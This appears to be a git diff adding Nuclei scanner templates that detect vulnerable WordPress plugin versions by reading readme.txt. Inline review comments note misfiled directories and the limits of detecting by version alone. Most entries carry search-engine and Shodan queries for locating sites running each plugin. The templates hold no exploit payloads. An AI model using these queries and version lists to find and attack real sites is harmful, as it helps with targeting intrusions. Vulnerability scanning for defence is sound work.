@@ -0,0 +1,59 @@ +id: cleantalk-spam-protect-b4bd0e37d2f4b2ce18d4435f62478a5b + +info: + name: > + Spam protection, Anti-Spam, FireWall by CleanTalk <= 6.44 - Authorization Bypass due to Missing Empty Value Check to Unauthenticated Arbitrary Plugin Installation + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/79ae062c-b084-4045-9407-2d94919993af?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cleantalk-spam-protect/" + google-query: inurl:"/wp-content/plugins/cleantalk-spam-protect/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cleantalk-spam-protect,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cleantalk-spam-protect/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cleantalk-spam-protect" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.44') \ No newline at end of file diff --git a/poc/other/elementor-2c0ba7008797c295f2668278862f26f2.yaml b/poc/other/elementor-2c0ba7008797c295f2668278862f26f2.yaml new file mode 100644 index 0000000000..393223a003 --- /dev/null +++ b/poc/other/elementor-2c0ba7008797c295f2668278862f26f2.yaml 
@@ -0,0 +1,59 @@ +id: elementor-2c0ba7008797c295f2668278862f26f2 + +info: + name: > + Elementor Website Builder – More than Just a Page Builder <= 3.25.7 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b1305be5-8267-475f-b962-62e3930116e1?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/elementor/" + google-query: inurl:"/wp-content/plugins/elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.25.7') \ No newline at end of file diff --git a/poc/other/inpost-gallery-2919c831aa5a75589b7d8a36cf988930.yaml b/poc/other/inpost-gallery-2919c831aa5a75589b7d8a36cf988930.yaml new file mode 100644 index 0000000000..846b0e54d1 --- /dev/null +++ b/poc/other/inpost-gallery-2919c831aa5a75589b7d8a36cf988930.yaml 
@@ -0,0 +1,59 @@ +id: inpost-gallery-2919c831aa5a75589b7d8a36cf988930 + +info: + name: > + InPost Gallery <= 2.1.4.2 - Authenticated (Subscriber+) Arbitrary Shortcode Execution via inpost_gallery_get_shortcode_template + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5fbb2dcf-38b8-4ef1-bfea-bf5872cc7e37?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/inpost-gallery/" + google-query: inurl:"/wp-content/plugins/inpost-gallery/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,inpost-gallery,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/inpost-gallery/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "inpost-gallery" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.4.2') \ No newline at end of file diff --git a/poc/other/jeg-elementor-kit-65f8ab2de6de83568fad8650a9c6403f.yaml b/poc/other/jeg-elementor-kit-65f8ab2de6de83568fad8650a9c6403f.yaml new file mode 100644 index 0000000000..e98d887cd3 --- /dev/null +++ b/poc/other/jeg-elementor-kit-65f8ab2de6de83568fad8650a9c6403f.yaml 
@@ -0,0 +1,59 @@ +id: jeg-elementor-kit-65f8ab2de6de83568fad8650a9c6403f + +info: + name: > + Jeg Elementor Kit <= 2.6.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via JKit - Countdown Widget + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/98aed079-672c-43bb-a5eb-faf8ffc04b71?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/jeg-elementor-kit/" + google-query: inurl:"/wp-content/plugins/jeg-elementor-kit/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,jeg-elementor-kit,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jeg-elementor-kit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jeg-elementor-kit" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.9') \ No newline at end of file diff --git a/poc/other/jeg-elementor-kit-8661863ce6f4b8a6d1c36b185972e474.yaml b/poc/other/jeg-elementor-kit-8661863ce6f4b8a6d1c36b185972e474.yaml new file mode 100644 index 0000000000..aecce22664 --- /dev/null +++ b/poc/other/jeg-elementor-kit-8661863ce6f4b8a6d1c36b185972e474.yaml 
@@ -0,0 +1,59 @@ +id: jeg-elementor-kit-8661863ce6f4b8a6d1c36b185972e474 + +info: + name: > + Jeg Elementor Kit <= 2.6.9 - Authenticated (Contributor+) Sensitive Information Exposure via sg_content_template + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4efc9c47-321a-4635-943f-785ffc34d851?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/jeg-elementor-kit/" + google-query: inurl:"/wp-content/plugins/jeg-elementor-kit/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,jeg-elementor-kit,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jeg-elementor-kit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jeg-elementor-kit" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.9') \ No newline at end of file diff --git a/poc/other/security-malware-firewall-7797f9e03c89bedae049ae2c17c746f0.yaml b/poc/other/security-malware-firewall-7797f9e03c89bedae049ae2c17c746f0.yaml new file mode 100644 index 0000000000..9ce26eb929 --- /dev/null +++ b/poc/other/security-malware-firewall-7797f9e03c89bedae049ae2c17c746f0.yaml 
@@ -0,0 +1,59 @@ +id: security-malware-firewall-7797f9e03c89bedae049ae2c17c746f0 + +info: + name: > + Security & Malware scan by CleanTalk <= 2.145 - Authorization Bypass via Reverse DNS Spoofing to Unauthenticated SQL Injection + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2187311d-6651-4eca-806d-aa2ff9fae4e2?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/security-malware-firewall/" + google-query: inurl:"/wp-content/plugins/security-malware-firewall/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,security-malware-firewall,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/security-malware-firewall/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "security-malware-firewall" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.145') \ No newline at end of file diff --git a/poc/other/skt-nurcaptcha-f122a6109fde182691f204ad9efb3807.yaml b/poc/other/skt-nurcaptcha-f122a6109fde182691f204ad9efb3807.yaml new file mode 100644 index 0000000000..3781bf1825 --- /dev/null +++ b/poc/other/skt-nurcaptcha-f122a6109fde182691f204ad9efb3807.yaml 
@@ -0,0 +1,59 @@ +id: skt-nurcaptcha-f122a6109fde182691f204ad9efb3807 + +info: + name: > + Skt NURCaptcha <= 3.5.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/96e47918-7848-407a-8f77-dbbfeb17029d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/skt-nurcaptcha/" + google-query: inurl:"/wp-content/plugins/skt-nurcaptcha/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,skt-nurcaptcha,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/skt-nurcaptcha/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "skt-nurcaptcha" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.0') \ No newline at end of file diff --git a/poc/other/support-svg-108b7823fe9b1674d1b2bbf51f4ed1b3.yaml b/poc/other/support-svg-108b7823fe9b1674d1b2bbf51f4ed1b3.yaml new file mode 100644 index 0000000000..f45cbbdd0b --- /dev/null +++ b/poc/other/support-svg-108b7823fe9b1674d1b2bbf51f4ed1b3.yaml 
@@ -0,0 +1,59 @@ +id: support-svg-108b7823fe9b1674d1b2bbf51f4ed1b3 + +info: + name: > + Support SVG – Upload svg files in wordpress without hassle <= 1.1.0 - Authenticated (Author+) Stored Cross-site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d9207baf-348c-4d3b-a6f0-cbfcd2624f78?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/support-svg/" + google-query: inurl:"/wp-content/plugins/support-svg/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,support-svg,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/support-svg/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "support-svg" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.0') \ No newline at end of file diff --git a/poc/remote_code_execution/additional-order-filters-for-woocommerce-871d7de019dc16d9e0194a95c1418987.yaml b/poc/remote_code_execution/additional-order-filters-for-woocommerce-871d7de019dc16d9e0194a95c1418987.yaml new file mode 100644 index 0000000000..d69bea58d7 --- /dev/null +++ b/poc/remote_code_execution/additional-order-filters-for-woocommerce-871d7de019dc16d9e0194a95c1418987.yaml 
@@ -0,0 +1,59 @@ +id: additional-order-filters-for-woocommerce-871d7de019dc16d9e0194a95c1418987 + +info: + name: > + Additional Order Filters for WooCommerce <= 1.21 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d59ea96f-ad02-4189-8155-7de7de5556ba?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/additional-order-filters-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/additional-order-filters-for-woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,additional-order-filters-for-woocommerce,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/additional-order-filters-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "additional-order-filters-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.21') \ No newline at end of file diff --git a/poc/remote_code_execution/product-input-fields-for-woocommerce-c39fb77f63e19b35a67746752819632d.yaml b/poc/remote_code_execution/product-input-fields-for-woocommerce-c39fb77f63e19b35a67746752819632d.yaml new file mode 100644 index 0000000000..f61bf5054e --- /dev/null +++ b/poc/remote_code_execution/product-input-fields-for-woocommerce-c39fb77f63e19b35a67746752819632d.yaml 
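Review bot: This Reflected Cross-Site Scripting template is filed under `poc/remote_code_execution/`, and the same directory receives an Arbitrary File Read (L153), an Arbitrary Option Update (L154) and a Stored XSS (L155), while an XSS template lands in `poc/search/` (L156) and a CSRF template in `poc/sql/` (L158). The placement looks keyed on words in the plugin slug rather than on the vulnerability class, which defeats browsing the tree by impact. Filing by the class given in `name` (or keeping all Wordfence-derived templates in one directory) would be more predictable.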
@@ -0,0 +1,59 @@ +id: product-input-fields-for-woocommerce-c39fb77f63e19b35a67746752819632d + +info: + name: > + Product Input Fields for WooCommerce <= 1.9 - Authenticated (Contributor+) Arbitrary File Read + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e45207af-3886-4d95-9cd8-5ecdc683dc58?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/product-input-fields-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/product-input-fields-for-woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,product-input-fields-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/product-input-fields-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "product-input-fields-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9') \ No newline at end of file diff --git a/poc/remote_code_execution/woocommerce-booking-4e73e0f016338be497c921cd08f860d0.yaml b/poc/remote_code_execution/woocommerce-booking-4e73e0f016338be497c921cd08f860d0.yaml new file mode 100644 index 0000000000..1ef79eca29 --- /dev/null +++ b/poc/remote_code_execution/woocommerce-booking-4e73e0f016338be497c921cd08f860d0.yaml 
@@ -0,0 +1,59 @@ +id: woocommerce-booking-4e73e0f016338be497c921cd08f860d0 + +info: + name: > + Booking & Appointment Plugin for WooCommerce <= 6.9.0 - Authenticated (Subscriber+) Arbitrary Option Update + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6ed215da-10c5-469b-bab2-923808feebd4?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woocommerce-booking/" + google-query: inurl:"/wp-content/plugins/woocommerce-booking/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woocommerce-booking,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-booking/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-booking" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.9.0') \ No newline at end of file diff --git a/poc/remote_code_execution/woocommerce-jetpack-df377aa55171c3c6046688a216c80943.yaml b/poc/remote_code_execution/woocommerce-jetpack-df377aa55171c3c6046688a216c80943.yaml new file mode 100644 index 0000000000..7dbb631a6a --- /dev/null +++ b/poc/remote_code_execution/woocommerce-jetpack-df377aa55171c3c6046688a216c80943.yaml 
@@ -0,0 +1,59 @@ +id: woocommerce-jetpack-df377aa55171c3c6046688a216c80943 + +info: + name: > + Booster for WooCommerce <= 7.2.3 - Authenticated (ShopManager+) Stored Cross-Site Scripting via wcj_product_meta Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0abf9705-2716-403f-9348-e43a8d8fb1d2?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woocommerce-jetpack/" + google-query: inurl:"/wp-content/plugins/woocommerce-jetpack/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woocommerce-jetpack,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-jetpack/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-jetpack" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.2.3') \ No newline at end of file diff --git a/poc/search/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/search/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml new file mode 100644 index 0000000000..6535040471 --- /dev/null +++ b/poc/search/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml 
@@ -0,0 +1,59 @@ +id: cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9 + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cm-on-demand-search-and-replace/" + google-query: inurl:"/wp-content/plugins/cm-on-demand-search-and-replace/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cm-on-demand-search-and-replace,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-on-demand-search-and-replace/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-on-demand-search-and-replace" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.2') \ No newline at end of file diff --git a/poc/social/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml b/poc/social/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml new file mode 100644 index 0000000000..240903a856 --- /dev/null +++ b/poc/social/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml 
@@ -0,0 +1,59 @@
+id: twitter-posts-8f2dbde369351cc27693796adbcd9a58
+
+info:
+ name: >
+ TwitterPosts <= 1.0.2 - Cross-Site Request Forgery to Plugin Settings Update
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/66f82859-1798-42ed-bb6a-44b0af438c7f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/twitter-posts/"
+ google-query: inurl:"/wp-content/plugins/twitter-posts/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,twitter-posts,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/twitter-posts/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "twitter-posts"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
diff --git a/poc/sql/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml b/poc/sql/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml
new file mode 100644
index 0000000000..34870a3229
--- /dev/null
+++ b/poc/sql/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml
@@ -0,0 +1,59 @@
+id: CVE-2023-7297-a95d63f970ebd421a8709918222db375
+
+info:
+ name: >
+ TwitterPosts <= 1.0.2 - Cross-Site Request Forgery to Plugin Settings Update
+ author: topscoder
+ severity: medium
+ description: >
+ The TwitterPosts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.2. This is due to missing or incorrect nonce validation on one of its functions. This makes it possible for unauthenticated attackers to change the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/66f82859-1798-42ed-bb6a-44b0af438c7f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2023-7297
+ metadata:
+ fofa-query: "wp-content/plugins/twitter-posts/"
+ google-query: inurl:"/wp-content/plugins/twitter-posts/"
+ shodan-query: 'vuln:CVE-2023-7297'
+ tags: cve,wordpress,wp-plugin,twitter-posts,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/twitter-posts/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "twitter-posts"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml b/poc/sql/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml
new file mode 100644
index 0000000000..efba34e940
--- /dev/null
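Review bot: A match here proves only that readme.txt advertises a `Stable tag` <= 1.0.2, not that the CSRF is present: the readme can lag the deployed code, survive an uninstall, or be removed by hardening (a false negative), and nothing in the template observes the affected settings handler. Since `description` is populated in this template, the limitation belongs there, e.g. `Version fingerprint via readme.txt Stable tag only; confirm the installed version before reporting.`, so downstream triage does not treat a hit as a confirmed vulnerability. The same caveat applies to every readme.txt/compare_versions template in this patch, and matters most for the high-severity CVE-2024-10570 SQL injection template where a false positive is expensive to chase. Separately, a CSRF template under poc/sql/ is miscategorised.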
+++ b/poc/sql/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9
+
+info:
+ name: >
+ Security & Malware scan by CleanTalk <= 2.145 - Authorization Bypass via Reverse DNS Spoofing to Unauthenticated SQL Injection
+ author: topscoder
+ severity: high
+ description: >
+ The Security & Malware scan by CleanTalk plugin for WordPress is vulnerable to unauthorized SQL Injection due to an authorization bypass via reverse DNS spoofing on the checkWithoutToken function in all versions up to, and including, 2.145, as well as insufficient input sanitization and validation. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2187311d-6651-4eca-806d-aa2ff9fae4e2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2024-10570
+ metadata:
+ fofa-query: "wp-content/plugins/security-malware-firewall/"
+ google-query: inurl:"/wp-content/plugins/security-malware-firewall/"
+ shodan-query: 'vuln:CVE-2024-10570'
+ tags: cve,wordpress,wp-plugin,security-malware-firewall,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/security-malware-firewall/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "security-malware-firewall"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.145')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml b/poc/sql/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml
new file mode 100644
index 0000000000..285f4876ec
--- /dev/null
+++ b/poc/sql/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9
+
+info:
+ name: >
+ BNE Gallery Extended <= 1.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via gallery Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The BNE Gallery Extended plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gallery' shortcode in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1f9277d8-ac81-4950-a1e5-4e6c6b042f84?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11119
+ metadata:
+ fofa-query: "wp-content/plugins/bne-gallery-extended/"
+ google-query: inurl:"/wp-content/plugins/bne-gallery-extended/"
+ shodan-query: 'vuln:CVE-2024-11119'
+ tags: cve,wordpress,wp-plugin,bne-gallery-extended,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bne-gallery-extended/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bne-gallery-extended"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.1')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml b/poc/sql/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml
new file mode 100644
index 0000000000..ea5f97b40d
--- /dev/null
